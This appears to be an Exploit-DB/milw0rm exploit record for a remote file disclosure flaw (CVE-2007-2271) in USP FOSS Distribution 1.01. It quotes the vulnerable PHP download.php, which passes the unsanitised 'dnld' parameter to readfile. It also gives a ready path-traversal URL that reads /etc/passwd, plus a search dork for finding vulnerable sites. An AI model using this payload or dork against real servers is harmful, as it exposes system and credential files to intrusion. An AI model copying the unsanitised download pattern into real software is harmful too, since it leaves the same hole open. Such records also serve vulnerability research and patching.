USP FOSS Distribution 1.01 - 'dnld' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-04-23
date_updated:
verified: 1
codes: OSVDB-35324;CVE-2007-2271
tags:
aliases:
screenshot_url:
application_url:
# USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
# D.Script: http://norcalvex.org/pagode/uspfoss_v1_01.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Dork:intitle:USP FOSS Distribution
# V.Code In /user/download.php:
###################/user/download.php###################
# <?
# $file = @$_GET['dnld'];<----[+]
# header('Content-Description: File Transfer');
# header('Content-Type: application/force-download');
# header('Content-Length: ' . filesize($file));
# header('Content-Disposition: attachment; filename=' . basename($file));
# readfile($file); <----[+]
# ?>
########################################################
# Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk
# milw0rm.com [2007-04-24]